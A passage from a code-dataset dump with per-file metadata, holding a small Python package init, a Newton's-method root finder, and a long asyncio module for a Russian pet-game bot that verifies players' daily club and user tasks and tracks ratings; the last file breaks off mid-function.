| 12 | 36 | 0.8125 | 6 | 48 | 6.5 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04878 | 0.145833 | 48 | 3 | 37 | 16 | 0.902439 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b04256d9753c35c0e9c816eea6228674b1d572b1 | 111 | py | Python | models/imagenet/__init__.py | mathczh/GANL2L | fdffbcb1547cf8f3a7287a4a21d3f4871f3e4e42 | [
"MIT"
] | null | null | null | models/imagenet/__init__.py | mathczh/GANL2L | fdffbcb1547cf8f3a7287a4a21d3f4871f3e4e42 | [
"MIT"
] | null | null | null | models/imagenet/__init__.py | mathczh/GANL2L | fdffbcb1547cf8f3a7287a4a21d3f4871f3e4e42 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
# from .cnn import *
from .resnet import *
# from .orthresnet import *
| 18.5 | 38 | 0.756757 | 14 | 111 | 5.642857 | 0.5 | 0.379747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171171 | 111 | 5 | 39 | 22.2 | 0.858696 | 0.396396 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b042f777f7668e89646351866ef9f0175c8234b2 | 907 | py | Python | 105torus_2017/torus_newton.py | ltabis/epitech-projects | e38b3f00a4ac44c969d5e4880cd65084dc2c870a | [
"MIT"
] | null | null | null | 105torus_2017/torus_newton.py | ltabis/epitech-projects | e38b3f00a4ac44c969d5e4880cd65084dc2c870a | [
"MIT"
] | null | null | null | 105torus_2017/torus_newton.py | ltabis/epitech-projects | e38b3f00a4ac44c969d5e4880cd65084dc2c870a | [
"MIT"
] | 1 | 2021-01-07T17:41:14.000Z | 2021-01-07T17:41:14.000Z | #!/usr/bin/python3
from sys import *
def do_newton(tab, n):
xn = 0.5
res = (float(tab[5]) * (xn**4)) + (float(tab[4]) * (xn**3)) + (float(tab[3]) * (xn**2)) + (float(tab[2]) * xn) + float(tab[1])
deriv = (4 * float(tab[5]) * (xn**3)) + (3 * float(tab[4]) * (xn**2)) + (2 * float(tab[3]) * xn) + float(tab[2])
xn1 = xn - (res / deriv)
print("x = " + str(xn))
if xn != xn1:
print("x = {1:.{0}f}".format(n, xn1))
while (abs(xn1 - xn) / abs(xn1)) > 10**-n:
xn = xn1
res = (float(tab[5]) * (xn**4)) + (float(tab[4]) * (xn**3)) + (float(tab[3]) * (xn**2)) + (float(tab[2]) * xn) + float(tab[1])
deriv = (4 * float(tab[5]) * (xn**3)) + (3 * float(tab[4]) * (xn**2)) + (2 * float(tab[3]) * xn) + float(tab[2])
xn1 = xn - (res / deriv)
if str(xn) != str(xn1):
print("x = {1:.{0}f}".format(n, xn1))
| 45.35 | 138 | 0.429989 | 148 | 907 | 2.628378 | 0.209459 | 0.37018 | 0.092545 | 0.113111 | 0.750643 | 0.750643 | 0.750643 | 0.750643 | 0.750643 | 0.637532 | 0 | 0.079755 | 0.281147 | 907 | 19 | 139 | 47.736842 | 0.516871 | 0.018743 | 0 | 0.5 | 0 | 0 | 0.033746 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.0625 | 0 | 0.125 | 0.1875 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c67903d3d18cc0628dc36000a3511d86d7528805 | 58,300 | py | Python | utils/tasks.py | Wilidon/mpetsbot | 14f3d7b81f0439fd3585a466fe68d327bdbfcd56 | [
"MIT"
] | null | null | null | utils/tasks.py | Wilidon/mpetsbot | 14f3d7b81f0439fd3585a466fe68d327bdbfcd56 | [
"MIT"
] | null | null | null | utils/tasks.py | Wilidon/mpetsbot | 14f3d7b81f0439fd3585a466fe68d327bdbfcd56 | [
"MIT"
] | null | null | null | import asyncio
import random
import time
import traceback
from datetime import datetime
from loguru import logger
from python_rucaptcha import ImageCaptcha
from config import get_settings, get_db
from mpets import MpetsApi
from sql import crud
from utils import functions
from utils.constants import gifts_name, holiday_1402, holiday_2302, holiday_1402_prizes, holiday_2302_prizes, \
holiday_308, holiday_308_prizes, holiday_401, holiday_401_prizes, holiday_501, holiday_501_prizes
from utils.functions import get_mpets_api, notice
async def check_task(user, user_task, progress, task_name):
if user_task.end <= progress:
crud.update_club_task(id=user_task.id,
progress=user_task.end,
status="completed")
await functions.add_club_points(user_id=user.user_id,
club_id=user.club_id,
task_name=task_name)
else:
crud.update_club_task(user_task.id, progress)
async def checking_coin_task(mpets, user, user_task):
pet = await mpets.view_profile(user.pet_id)
if not pet["status"]:
# logging
return 0
if pet["club_coin"] is None:
# logging
return 0
progress = int(pet["club_coin"])
await check_task(user, user_task, progress, user_task.task_name)
async def checking_heart_task(mpets, user, user_task):
page, progress, step, counter = 1, 0, True, 0
while step:
try:
pets = await mpets.club_budget_history_all(
user.club_id, 2, page)
if not pets["players"]:
break
for pet in pets["players"]:
if pet["pet_id"] == user.pet_id:
progress = int(pet["count"])
step = False
break
page += 1
except Exception:
counter += 1
if counter >= 5:
return 0
await check_task(user, user_task, progress, user_task.task_name)
async def checking_exp_task(mpets, user, user_task):
page, progress, step, counter = 1, 0, True, 0
while step:
try:
pets = await mpets.club_budget_history_all(
user.club_id, 3, page)
if not pets["players"]:
break
for pet in pets["players"]:
if pet["pet_id"] == user.pet_id:
progress = int(pet["count"])
step = False
break
page += 1
except Exception:
counter += 1
if counter >= 5:
return 0
await check_task(user, user_task, progress, user_task.task_name)
async def checking_getGift_task(mpets, user, user_task):
gift_id = user_task.task_name.split("_")[-1]
pet_gift = False
if gift_id.isdigit() is False:
return 0
gifts = await mpets.view_gifts(user.pet_id)
if int(gift_id) == 0:
for gift in gifts["players"]:
if "сегодня" in gift["date"]:
pet_gift = True
if pet_gift:
await check_task(user, user_task, user_task.end, user_task.task_name)
else:
gift_id = int(gifts_name[int(gift_id) - 1][0])
for gift in gifts["players"]:
if gift_id in [26, 27, 35]:
if gift["pet_id"]:
try:
if "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 36 or
int(gift["present_id"]) == 26):
pet_gift = True
elif "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 37 or
int(gift["present_id"]) == 27):
pet_gift = True
elif "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 35 or
int(gift["present_id"]) == 38):
pet_gift = True
except Exception:
pass
else:
if gift["pet_id"]:
try:
if "сегодня" in gift["date"] and \
int(gift["present_id"]) == int(gift_id):
pet_gift = True
except Exception:
pass
if pet_gift:
await check_task(user, user_task, user_task.end, user_task.task_name)
async def checking_sendGift_task(mpets, user, user_task, pet_id):
gift_id = user_task.task_name.split("_")[-1]
pet_gift = False
if gift_id.isdigit() is False:
return 0
gifts = await mpets.view_gifts(pet_id)
if int(gift_id) == 0:
for gift in gifts["players"]:
if gift["pet_id"]:
try:
if user.pet_id == int(gift["pet_id"]) and \
"сегодня" in gift["date"]:
pet_gift = True
except Exception:
pass
if pet_gift:
await check_task(user, user_task, user_task.end, user_task.task_name)
return True
else:
gift_id = int(gifts_name[int(gift_id) - 1][0])
for gift in gifts["players"]:
if gift_id in [26, 27, 35]:
if gift["pet_id"]:
try:
if "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 36 or
int(gift["present_id"]) == 26) and \
user.pet_id == int(gift["pet_id"]):
pet_gift = True
elif "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 37 or
int(gift["present_id"]) == 27) and \
user.pet_id == int(gift["pet_id"]):
pet_gift = True
elif "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 35 or
int(gift["present_id"]) == 38) and \
user.pet_id == int(gift["pet_id"]):
pet_gift = True
except Exception:
pass
else:
if gift["pet_id"]:
try:
if "сегодня" in gift["date"] and \
int(gift["present_id"]) == gift_id and \
user.pet_id == int(gift["pet_id"]):
pet_gift = True
except Exception:
pass
if pet_gift:
await check_task(user, user_task, user_task.end, user_task.task_name)
return True
async def checking_chat_task(mpets, user, user_task):
today = int(datetime.today().strftime("%Y%m%d"))
chat = await mpets.chat(user.club_id)
for msg in chat["messages"]:
if crud.get_chat_message(user.club_id, user.pet_id, msg["message"],
today):
crud.update_club_task(user_task.id, user_task.end,
"completed")
await functions.add_club_points(user.user_id, user.club_id)
else:
if crud.get_chat_message(user.club_id, msg["pet_id"],
msg["message"], today) is None:
crud.create_chat_message(user.club_id, msg["pet_id"],
msg["message"], today)
async def checking_thread_task(mpets, user, user_task):
forums = await mpets.forums(user.club_id)
if forums["status"] == "error":
# logging
return False
progress = user_task.progress
for i in range(0, 2):
threads = await mpets.threads(forums["forums_id"][i]["forum_id"])
if threads["status"] != "ok":
continue
for thread in threads["threads"]:
page = 1
thread_data = crud.get_thread_messages(thread)
if not thread_data:
while True:
thread_info = await mpets.thread(thread, page)
if thread_info["status"] == "error":
break
for thread_msg in thread_info["messages"]:
crud.create_thread_message(user.club_id,
thread_msg["pet_id"],
thread,
thread_msg["message"],
page,
thread_msg["post_date"])
if user.pet_id == int(thread_msg["pet_id"]):
progress += 1
page += 1
else:
page = crud.get_last_page_thread(thread).page
page = int(page)
while True:
thread_info = await mpets.thread(thread, page)
if thread_info["status"] == "error":
break
for thread_msg in thread_info["messages"]:
if crud.check_msg(thread, thread_msg["message"],
thread_msg["post_date"],
page) is None:
crud.create_thread_message(user.club_id,
thread_msg["pet_id"],
thread,
thread_msg["message"],
page,
thread_msg["post_date"])
if user.pet_id == int(thread_msg["pet_id"]):
progress += 1
page += 1
if user_task.end <= progress:
crud.update_club_task(user_task.id, user_task.end,
"completed")
await functions.add_club_points(user.user_id, user.club_id)
else:
crud.update_club_task(user_task.id, progress)
async def checking_upRank_task(mpets, user, user_task):
history = await mpets.club_history(user.club_id)
today = datetime.today().strftime("%d.%m")
if not history["status"]:
# logging
return False
progress = user_task.progress
for his in history["history"]:
if user.pet_id == int(his["owner_id"]) and \
" повысил " in his["action"] and \
today == his["date"].split(" ")[0]:
progress += 1
await check_task(user, user_task, progress, user_task.task_name)
async def checking_downRank_task(mpets, user, user_task):
history = await mpets.club_history(user.club_id)
today = datetime.today().strftime("%d.%m")
if not history["status"]:
# logging
return False
progress = user_task.progress
for his in history["history"]:
if user.pet_id == int(his["owner_id"]) and \
" понизил " in his["action"] and \
today == his["date"].split(" ")[0]:
progress += 1
await check_task(user, user_task, progress, user_task.task_name)
async def checking_acceptPlayer_task(mpets, user, user_task):
history = await mpets.club_history(user.club_id)
today = datetime.today().strftime("%d.%m")
if not history["status"]:
# logging
return 0
progress = user_task.progress
for his in history["history"]:
if user.pet_id == int(his["owner_id"]) and \
"принял" in his["action"] and \
today == his["date"].split(" ")[0]:
progress += 1
await check_task(user, user_task, progress, user_task.task_name)
async def start_verify_club(club, mpets):
try:
today = int(datetime.today().strftime("%Y%m%d"))
profile = await mpets.profile()
if profile["club"] is None:
logger.info(f"{club.bot_name} исключен из клуба ({club.club_id}).")
crud.update_club_status(club.club_id, "excluded")
users = crud.get_users_with_club(club.club_id)
for user in users:
user_tasks = crud.get_club_tasks(user.user_id, today)
profile = await mpets.view_profile(user.pet_id)
if profile["club_id"] is None:
continue
if int(profile["club_id"]) != club.club_id:
return 0
for user_task in user_tasks:
try:
if user_task.status == "completed":
continue
elif user_task.task_name == "coin":
await checking_coin_task(mpets, user, user_task)
elif user_task.task_name == "heart":
await checking_heart_task(mpets, user, user_task)
elif user_task.task_name == "exp":
await checking_exp_task(mpets, user, user_task)
elif "get_gift" in user_task.task_name or \
"get_random_gift" in user_task.task_name:
await checking_getGift_task(mpets, user, user_task)
elif user_task.task_name == "chat":
await checking_chat_task(mpets, user, user_task)
elif user_task.task_name == "thread":
pass
# await checking_thread_task(mpets, user, user_task)
elif user_task.task_name == "upRank":
await checking_upRank_task(mpets, user, user_task)
elif user_task.task_name == "downRank":
await checking_downRank_task(mpets, user, user_task)
elif user_task.task_name == "acceptPlayer":
await checking_acceptPlayer_task(mpets, user, user_task)
except Exception as e:
log = logger.bind(context=e)
log.error(f"Не удалось задание у клуба({club.club_id})"
f"пользователь {user.user_id}"
f"ошибка {e}")
except Exception as e:
log = logger.bind(context=traceback.format_exc())
log.error(f"Не удалось проверить клуб({club.club_id}) \n")
async def start_verify_account(club, mpets):
profile = await mpets.profile()
if profile and not profile["status"]:
log = logger.bind(context=profile)
log.warning("Не удалось получить профиль.")
return False
if profile["club"] is not None:
crud.update_club_last_active(club_id=club.club_id)
logger.success(f"Клуб ({club.club_id}) подтвержден.")
crud.update_club_status(club.club_id, "ok")
async def checking_bots():
logger.debug("start checking_bots")
settings = get_settings()
while True:
try:
clubs_with_status_ok = crud.get_clubs(status="ok")
clubs_with_status_waiting = crud.get_clubs(status="waiting")
clubs_with_status_freeze = crud.get_clubs(status="freeze")
tasks = []
time0 = time.time()
for i in range(0, len(clubs_with_status_ok)):
club = clubs_with_status_ok[i]
mpets = await get_mpets_api(club=club, api_key=settings.api_key)
task = asyncio.create_task(start_verify_club(club,
mpets))
tasks.append(task)
if len(tasks) >= 20:
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
elif i + 1 == len(clubs_with_status_ok):
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
for i in range(0, len(clubs_with_status_waiting)):
club = clubs_with_status_waiting[i]
mpets = await get_mpets_api(club=club, api_key=settings.api_key)
if mpets is False:
crud.update_club_status(club_id=club.club_id,
status="excluded")
task = asyncio.create_task(start_verify_account(club, mpets))
tasks.append(task)
if len(tasks) >= 20:
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
elif i + 1 == len(clubs_with_status_waiting):
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
for i in range(0, len(clubs_with_status_freeze)):
club = clubs_with_status_freeze[i]
crud.update_club_last_active(club_id=club.club_id, difference=86400)
mpets = await get_mpets_api(club=club, api_key=settings.api_key)
if mpets is False:
crud.update_club_status(club_id=club.club_id,
status="excluded")
task = asyncio.create_task(start_verify_account(club, mpets))
tasks.append(task)
if len(tasks) >= 20:
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
elif i + 1 == len(clubs_with_status_freeze):
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
total_time = int(time.time() - time0)
crud.health(clubtasks=total_time)
await asyncio.sleep(1)
except Exception as e:
# raise
logger.error(e)
await asyncio.sleep(10)
async def update_user_data():
logger.debug("start update_user_data")
settings = get_settings()
mpets = MpetsApi(name=settings.bot1,
password=settings.bot_password,
rucaptcha_api=settings.api_key)
r = await mpets.login()
logger.bind(context=r).success("Функция обновления данных пользователей "
"запущена.")
while True:
try:
time0 = time.time()
users = crud.get_users()
for user in users:
if user.pet_id == 0:
continue
profile = await mpets.view_profile(user.pet_id)
if not profile['status']:
log = logger.bind(context=profile)
log.warning(f"Не удалось обновить информацию "
f"пользователя {user.user_id}")
continue
user = crud.get_user(user.user_id)
if user.club_id is not None:
if profile["club_id"] is None:
crud.reset_user_stats(user.user_id)
stats = crud.get_user_stats(user.user_id)
logger.warning(f"Сбросил статистику пользователя "
f"{user.user_id}. У него было "
f"{stats.club_tasks} ёлок и "
f"{stats.club_points} фишек.")
elif int(user.club_id) != int(profile["club_id"]):
crud.reset_user_stats(user.user_id)
stats = crud.get_user_stats(user.user_id)
logger.warning(f"Сбросил статистику пользователя "
f"{user.user_id}. У него было "
f"{stats.club_tasks} ёлок и "
f"{stats.club_points} фишек.")
crud.update_user_data(user.user_id, profile["pet_id"],
profile["name"], profile["club_id"])
total_time = int(time.time() - time0)
crud.health(userinfo=total_time)
await asyncio.sleep(3600)
except Exception as e:
logger.error(e)
await asyncio.sleep(3)
async def checking_avatar_task(mpets, user, user_task):
profile = await mpets.view_profile(user.pet_id)
if not profile["status"]:
return 0
task_name = user_task.task_name
avatar_id = user_task.task_name.split("_")[-1]
avatar_id = avatar_id.rsplit(":", maxsplit=1)[0]
if int(functions.avatar_name[int(avatar_id)][0]) == int(profile["ava_id"]):
ava = task_name.split("_", maxsplit=1)[-1]
start_time = ava.rsplit(":", maxsplit=1)[1]
if int(start_time) == 0:
task_name = f"avatar_{avatar_id}:{int(time.time())}"
crud.update_user_task_name(user_task.id, task_name)
else:
left_time = time.time() - int(start_time)
if left_time >= 3600:
crud.update_user_task(user_task.id, user_task.end, "completed")
await functions.add_user_points(user_id=user.user_id,
task_name="avatar")
else:
left_time = int(left_time // 60)
crud.update_user_task(user_task.id, left_time, "waiting")
else:
task_name = f"avatar_{avatar_id}:0"
crud.update_user_task(user_task.id, 0, "waiting")
crud.update_user_task_name(user_task.id, task_name)
async def checking_anketa_task(mpets, user, user_task):
profile = await mpets.view_anketa(user.pet_id)
if not profile["status"]:
return 0
task_name = user_task.task_name
anketa_about = task_name.split("_", maxsplit=1)[-1]
anketa_about = anketa_about.rsplit(":", maxsplit=1)[0]
if anketa_about != profile["about"]:
ank = task_name.split("_", maxsplit=1)[-1]
start_time = ank.rsplit(":", maxsplit=1)[1]
if int(start_time) == 0:
task_name = f"anketa_{anketa_about}:{int(time.time())}"
crud.update_user_task_name(user_task.id, task_name)
else:
left_time = time.time() - int(start_time)
if left_time >= 1800:
crud.update_user_task(user_task.id, user_task.end, "completed")
await functions.add_user_points(user_id=user.user_id,
task_name="anketa")
else:
left_time = int(left_time // 60)
crud.update_user_task(user_task.id, left_time, "waiting")
else:
task_name = f"anketa_{anketa_about}:0"
crud.update_user_task(user_task.id, 0, "waiting")
crud.update_user_task_name(user_task.id, task_name)
async def checking_online_task(mpets, user, user_task):
profile = await mpets.view_profile(user.pet_id)
if not profile["status"]:
return 0
if profile["last_login"] == "online":
task_name = user_task.task_name
if int(task_name.split("_")[1]) == 0:
task_name = "30online_" + str(int(time.time()))
crud.update_user_task_name(user_task.id, task_name)
return 0
else:
task_name = int(task_name.split("_")[1])
left_time = time.time() - task_name
if left_time >= 1800:
crud.update_user_task(user_task.id, user_task.end, "completed")
await functions.add_user_points(user_id=user.user_id,
task_name="30online")
else:
left_time = int(left_time // 60)
crud.update_user_task(user_task.id, left_time, "waiting")
else:
crud.update_user_task(user_task.id, 0, "waiting")
crud.update_user_task_name(user_task.id, "30online_0")
async def checking_inOnline_task(mpets, user, user_task):
profile = await mpets.view_profile(user.pet_id)
if not profile["status"]:
return 0
if profile["last_login"] == "online":
task_name = user_task.task_name
h, m = task_name.split("_")[-1].split(":")
current_date = time.strftime("%d %b %Y", time.gmtime(time.time()))
current_date += f' {h}:{m}'
unix_time = int(time.mktime(time.strptime(current_date, '%d %b %Y '
'%H:%M')))
if unix_time - 120 <= int(time.time()) <= unix_time + 120:
crud.update_user_task(user_task.id, user_task.end, "completed")
await functions.add_user_points(user_id=user.user_id,
task_name="online")
else:
# timeout
pass
async def checking_getGift_utask(mpets, user, user_task):
gift_id = user_task.task_name.split("_")[-1]
pet_gift = False
if gift_id.isdigit() is False:
return 0
gifts = await mpets.view_gifts(user.pet_id)
if int(gift_id) == 0:
for gift in gifts["players"]:
if "сегодня" in gift["date"]:
pet_gift = True
if pet_gift:
crud.update_user_task(user_task.id, user_task.end, "completed")
await functions.add_user_points(user_id=user.user_id,
task_name="get_gift")
else:
gift_id = int(gifts_name[int(gift_id) - 1][0])
for gift in gifts["players"]:
if gift_id in [26, 27, 35]:
if gift["pet_id"]:
try:
if "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 36 or
int(gift["present_id"]) == 26):
pet_gift = True
elif "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 37 or
int(gift["present_id"]) == 27):
pet_gift = True
elif "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 35 or
int(gift["present_id"]) == 38):
pet_gift = True
except Exception:
pass
else:
if gift["pet_id"]:
try:
if "сегодня" in gift["date"] and \
int(gift["present_id"]) == int(gift_id):
pet_gift = True
except Exception:
pass
if pet_gift:
crud.update_user_task(user_task.id, user_task.end, "completed")
await functions.add_user_points(user_id=user.user_id,
task_name="get_gift")
async def checking_sendGift_utask(mpets, user, user_task, pet_id):
gift_id = user_task.task_name.split("_")[-1]
pet_gift = False
if gift_id.isdigit() is False:
return 0
gifts = await mpets.view_gifts(pet_id)
if int(gift_id) == 0:
for gift in gifts["players"]:
if gift["pet_id"]:
try:
if user.pet_id == int(gift["pet_id"]) and \
"сегодня" in gift["date"]:
pet_gift = True
except Exception:
pass
if pet_gift:
crud.update_user_task(user_task.id, user_task.end, "completed")
await functions.add_user_points(user_id=user.user_id,
task_name=user_task.task_name)
return True
else:
gift_id = int(gifts_name[int(gift_id) - 1][0])
for gift in gifts["players"]:
if gift_id in [26, 27, 35]:
if gift["pet_id"]:
try:
if "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 36 or
int(gift["present_id"]) == 26) and \
user.pet_id == int(gift["pet_id"]):
pet_gift = True
elif "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 37 or
int(gift["present_id"]) == 27) and \
user.pet_id == int(gift["pet_id"]):
pet_gift = True
elif "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 35 or
int(gift["present_id"]) == 38) and \
user.pet_id == int(gift["pet_id"]):
pet_gift = True
except Exception:
pass
else:
if gift["pet_id"]:
try:
if "сегодня" in gift["date"] and \
int(gift["present_id"]) == gift_id and \
user.pet_id == int(gift["pet_id"]):
pet_gift = True
except Exception:
pass
if pet_gift:
crud.update_user_task(user_task.id, user_task.end, "completed")
await functions.add_user_points(user_id=user.user_id,
task_name=user_task.task_name)
return True
async def start_verify_user(user, cookies):
today = int(datetime.today().strftime("%Y%m%d"))
user_tasks = crud.get_user_tasks(user.user_id, today)
'''user_bot = crud.get_bot(user.user_id)
if user_bot is None:
mpets = MpetsApi()
resp = await mpets.start()
if resp["status"] == "ok":
user_bot = crud.create_bot(user.user_id, resp["pet_id"],
resp["name"], resp["password"])
else:
log = logger.bind(context=f"account {resp}")
log.warning(f"Ошибка при создании бота. Пользователь:"
f" {user.user_id}")
return False
if not user_tasks:
return False
mpets = MpetsApi(user_bot.name, user_bot.password)
resp = await mpets.login()
if resp["status"] != "ok":
log = logger.bind(context=f"account {resp}")
log.warning(f"Ошибка при авторизации бота. Пользователь:"
f" {user.user_id}")
mpets = MpetsApi()
resp = await mpets.start()
if resp["status"] == "ok":
user_bot = crud.update_bot(user.user_id, resp["pet_id"],
resp["name"], resp["password"])
else:
log = logger.bind(context=f"account {resp}")
log.warning(f"Ошибка при создании бота. Пользователь:"
f" {user.user_id}")
return False
mpets = MpetsApi(user_bot.name, user_bot.password)
resp = await mpets.login()
if resp["status"] != "ok":
log = logger.bind(context=f"account {resp}")
log.warning(f"Ошибка при авторизации бота. Пользователь:"
f" {user.user_id}")
mpets = MpetsApi()
await mpets.start()'''
mpets = MpetsApi(cookies=cookies)
# await mpets.start()
for user_task in user_tasks:
try:
if user_task.status == "completed":
continue
elif user_task.status == "timeout":
continue
elif "avatar" in user_task.task_name:
await checking_avatar_task(mpets, user, user_task)
elif "anketa" in user_task.task_name:
await checking_anketa_task(mpets, user, user_task)
elif "30online" in user_task.task_name:
await checking_online_task(mpets, user, user_task)
elif "in_online" in user_task.task_name:
await checking_inOnline_task(mpets, user, user_task)
elif "get_gift" in user_task.task_name or \
"get_random_gift" in user_task.task_name:
await checking_getGift_utask(mpets, user, user_task)
except Exception as e:
logger.error(f"start_verify_user {user.user_id}"
f"task {user_task.task_name}"
f"error {e}")
async def checking_users_tasks():
logger.debug("start checking_users_tasks")
mpets_sessions = []
for i in range(8):
mpets = MpetsApi()
r = await mpets.start()
if r['status']:
mpets_sessions.append(r['cookies'])
while True:
try:
users = crud.get_users_with_status("ok")
tasks, counter = [], 0
time0 = int(time.time())
for i in range(0, len(users)):
user = users[i]
today = int(datetime.today().strftime("%Y%m%d"))
user_tasks = crud.get_user_tasks(user.user_id, today)
if not user_tasks:
continue
task = asyncio.create_task(start_verify_user(user,
mpets_sessions[
random.randint(0, len(mpets_sessions) - 1)]))
tasks.append(task)
if len(tasks) >= 5:
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
elif i + 1 == len(users):
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
total_time = int(time.time() - time0)
crud.health(usertasks=total_time)
await asyncio.sleep(5)
except Exception as e:
logger.error(e)
await asyncio.sleep(10)
async def creating_club_tasks():
logger.debug("start creating_club_tasks")
settings = get_settings()
while True:
try:
today = int(datetime.today().strftime("%Y%m%d"))
user_tasks = crud.get_club_tasks_all(today, "generation")
for user_task in user_tasks:
user = crud.get_user(user_id=user_task.user_id)
club = crud.get_club(club_id=user.club_id)
mpets = await get_mpets_api(club=club, api_key=settings.api_key)
await functions.creation_club_tasks(user_task, mpets)
await asyncio.sleep(3)
except Exception as e:
# raise
logger.error(f"Ошибка при создании задания {e}")
await asyncio.sleep(10)
async def checking_thread():
logger.debug("start checking_thread")
mpets = MpetsApi()
await mpets.start()
thread_id, page = 2600581, 1
while True:
try:
thread = await mpets.thread(thread_id, page)
for msg in thread['messages']:
if crud.get_message(thread_id=thread_id,
message_id=msg['message_id']):
continue
user = crud.get_user_pet_id(msg['pet_id'])
if user is None:
crud.create_play_message(pet_id=msg['pet_id'],
thread_id=thread_id,
message_id=msg['message_id'],
page=page)
continue
last_msg = crud.get_message(thread_id=thread_id,
message_id=int(msg['message_id']) - 1)
if last_msg is None:
pass
else:
if last_msg.pet_id == user.pet_id:
crud.create_play_message(pet_id=msg['pet_id'],
thread_id=thread_id,
message_id=msg['message_id'],
page=page)
continue
today = int(datetime.today().strftime("%Y%m%d"))
user_tasks = crud.get_club_tasks(user.user_id, today, "waiting")
for task in user_tasks:
if task.task_name != "play":
continue
await check_task(user, task, task.progress + 1, "play")
crud.create_play_message(pet_id=msg['pet_id'],
thread_id=thread_id,
message_id=msg['message_id'],
page=page)
if len(thread['messages']) == 15:
page += 1
await asyncio.sleep(3)
except Exception as e:
pass
async def update_charm_rating():
logger.debug("start update_charm_rating")
mpets = MpetsApi()
await mpets.start()
page = 1
time0 = time.time()
while True:
try:
game_time = await mpets.game_time()
if not game_time["status"]:
await asyncio.sleep(5)
continue
if int(game_time["time"].split(":")[1]) % 10 == 0:
await asyncio.sleep(5)
continue
resp = await mpets.best("charm", page)
# elapsed_time = time.time() - time0
# logger.info(f"запрос выполнился за | {elapsed_time}")
if not resp["status"]:
continue
for pet in resp["pets"]:
top = crud.get_charm_place(place=pet["place"])
if top is None:
crud.create_charm_rating(pet_id=pet["pet_id"],
place=pet["place"],
score=pet["beauty"])
continue
today = int(datetime.today().strftime("%Y%m%d"))
user = crud.get_user_pet_id(pet_id=pet["pet_id"])
if user is None:
crud.update_charm_place(pet_id=pet["pet_id"],
place=pet["place"],
score=pet["beauty"])
continue
user_task = crud.get_user_task_name(user_id=user.user_id,
task_name="charm",
today=today)
if user_task is None:
crud.update_charm_place(pet_id=pet["pet_id"],
place=pet["place"],
score=pet["beauty"])
continue
elif user_task.status == "completed":
continue
else:
# если разность больше 0, то игрок должен набрать еще рейтинга
difference = user_task.end - int(pet["score"])
if difference > 0:
end = 0
# количество очков меньше, чем нужно
if user_task.progress < int(pet["score"]):
# количество очков увеличилось
a = int(pet["score"]) - user_task.progress
progress = user_task.progress + a
else:
# количество очков уменьшилось
progress = int(pet["score"])
end = progress + 30
crud.update_user_task(id=user_task.id,
progress=progress)
if end != 0:
crud.update_user_task_end(id=user_task.id,
end=end)
else:
crud.update_user_task(id=user_task.id,
progress=user_task.end,
status="completed")
await functions.add_user_points(user_id=user.user_id,
task_name="charm")
crud.update_charm_place(pet_id=pet["pet_id"],
place=pet["place"],
score=pet["beauty"])
page += 1
if page >= 668:
elapsed_time = int(time.time() - time0)
crud.health(charm=elapsed_time)
page = 1
time0 = time.time()
await asyncio.sleep(1)
except Exception:
pass
async def update_races_rating():
logger.debug("start update_races_rating")
mpets = MpetsApi()
await mpets.start()
page = 1
time0 = time.time()
while True:
try:
game_time = await mpets.game_time()
if not game_time["status"]:
continue
if int(game_time["time"].split(":")[1]) % 10 == 0:
continue
resp = await mpets.best("races", page)
if not resp["status"]:
continue
for pet in resp["pets"]:
top = crud.get_races_place(place=pet["place"])
if top is None:
crud.create_races_rating(pet_id=pet["pet_id"],
place=pet["place"],
score=pet["beauty"])
continue
today = int(datetime.today().strftime("%Y%m%d"))
user = crud.get_user_pet_id(pet_id=pet["pet_id"])
if user is None:
crud.update_races_place(pet_id=pet["pet_id"],
place=pet["place"],
score=pet["beauty"])
continue
user_task = crud.get_user_task_name(user_id=user.user_id,
task_name="races",
today=today)
if user_task is None:
continue
elif user_task.status == "completed":
continue
else:
difference = user_task.end - int(pet["score"])
if difference > 0:
end = 0
# количество очков меньше, чем нужно
if user_task.progress < int(pet["score"]):
# количество очков увеличилось
